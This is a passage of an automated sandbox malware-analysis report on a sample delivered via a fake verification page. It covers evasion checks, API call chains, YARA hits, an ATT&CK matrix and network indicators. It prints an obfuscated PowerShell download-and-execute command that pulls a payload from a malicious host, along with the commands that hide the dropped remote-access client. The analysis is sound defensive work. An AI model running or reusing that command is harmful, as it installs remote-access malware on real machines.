                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Process information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Code function: 21_2_110B8200 Sleep,ExitProcess,21_2_110B8200
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1038
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8835
                                  Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 459
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\bpsFyf\remcmdstub.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Evaded block: after key decision (graph_21-65689)
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Evaded block: after key decision (graph_21-69719)
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Evaded block: after key decision (graph_21-69974)
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Evaded block: after key decision (graph_21-69934)
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Evasive API call chain: GetLocalTime,DecisionNodes (graph_21-70059)
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_21-66218)
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe API coverage: 5.5 %
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep time: -7378697629483816s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Last function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,21_2_1102D330
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,21_2_11065890
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,21_2_1106A0A0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,21_2_111266E0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB7112610 GetSystemInfo,12_2_00007FFEB7112610
                                  Source: client32.exe, 00000015.00000003.1980133630.0000000006157000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.2279010250.0000000006141000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.1981222393.0000000006141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
                                  Source: HTCTL32.DLL.12.drBinary or memory string: VMware
                                  Source: HTCTL32.DLL.12.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: TCCTL32.DLL.12.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                  Source: mshta.exe, 0000000B.00000003.1757222957.00000254956DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.00000254956D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2417429700.0000000006110000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2407434986.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: HTCTL32.DLL.12.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: TCCTL32.DLL.12.drBinary or memory string: VMWare
                                  Source: mshta.exe, 0000000B.00000002.1764062895.0000025495683000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/CQ
                                  Source: mshta.exe, 0000000B.00000003.1755200295.0000025C982C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cladl*
                                  Source: powershell.exe, 0000000C.00000002.2019703898.000002F279FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe API call chain: ExitProcess graph end node (graph_21-65757)
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_11161D01
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,21_2_11147750
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,21_2_11029590
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1108BF30 GetTokenInformation,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,IsValidSid,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,21_2_1108BF30
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,21_2_11093080
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,21_2_110310C0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_1116DD89

                                  HIPS / PFW / Operating System Protection Evasion

                                  Source: Yara match, File source: amsi64_7944.amsi.csv, type: OTHER
                                  Source: Yara match, File source: Process Memory Space: mshta.exe PID: 7848, type: MEMORYSTR
                                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,21_2_110F4560
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,21_2_1111FCA0
                                  Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\bpsFyf
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe "C:\Users\user\AppData\Roaming\bpsFyf\client32.exe"
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\bpsFyf
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,21_2_1109E190
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,21_2_1109E910
                                  Source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                  Source: client32.exe, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drBinary or memory string: Shell_TrayWnd
                                  Source: client32.exe, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drBinary or memory string: Progman
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,21_2_11173A35
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,21_2_11173D69
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_11173CC6
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: GetLocaleInfoA,21_2_1116B38E
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,21_2_11173933
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,21_2_111739DA
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_1117383E
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_11173D2D
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,21_2_11173C06
                                  Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                  Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                  Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe Queries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,21_2_110F33F0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11177075 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,21_2_11177075
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,21_2_1103B160
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,21_2_11174AE9
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111450A0 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,21_2_111450A0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,21_2_11070090
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,21_2_110D8200
Source: Yara match; File source: 21.2.client32.exe.73d70000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.0.client32.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.2.client32.exe.73d50000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.2.client32.exe.6c600000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000000.1975726137.0000000000D1F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: client32.exe PID: 7368, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dll, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLL, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Data Obfuscation | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 4 Native API | 2 Valid Accounts | 2 Valid Accounts | 3 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 13 Ingress Tool Transfer | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 1 Windows Service | 21 Access Token Manipulation | 1 Software Packing | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | 1 Browser Extensions | 1 Windows Service | 1 DLL Side-Loading | NTDS | 35 System Information Discovery | Distributed Component Object Model | 1 Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 11 Registry Run Keys / Startup Folder | 13 Process Injection | 1 Masquerading | LSA Secrets | 41 Security Software Discovery | SSH | 3 Clipboard Data | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 11 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 13 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Rundll32 | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
[Behavior graph (image not reproduced): Behavior Graph ID: 1544089; URL: https://inspyrehomedesign.c...; Startdate: 28/10/2024; Architecture: WINDOWS; Score: 100]

                                  No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLL | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL | 12% | ReversingLabs | |
C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\bpsFyf\client32.exe | 13% | ReversingLabs | |
C:\Users\user\AppData\Roaming\bpsFyf\msvcr100.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dll | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\bpsFyf\remcmdstub.exe | 12% | ReversingLabs | |
                                  No Antivirus matches
                                  No Antivirus matches
Source | Detection | Scanner | Label | Link
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://www.symauth.com/cps0( | 0% | URL Reputation | safe |
http://www.symauth.com/rpa00 | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://crl.v | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
traversecityspringbreak.com | 166.1.160.211 | true | true | | unknown
inspyrehomedesign.com | 166.1.160.75 | true | true | | unknown
geo.netsupportsoftware.com | 172.67.68.212 | true | false | | unknown
www.google.com | 172.217.16.196 | true | false | | unknown
i.ibb.co | 162.19.58.157 | true | false | | unknown
use.fontawesome.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://i.ibb.co/t8b1Qdw/1q.png | true | | unknown
http://geo.netsupportsoftware.com/location/loca.asp | true | | unknown
https://inspyrehomedesign.com/favicon.ico | true | | unknown
http://traversecityspringbreak.com/o/o.png | true | | unknown
https://inspyrehomedesign.com/ | true | | unknown
http://92.255.85.135/fakeurl.htm | true | | unknown
https://inspyrehomedesign.com/Ray-verify.html | true | | unknown
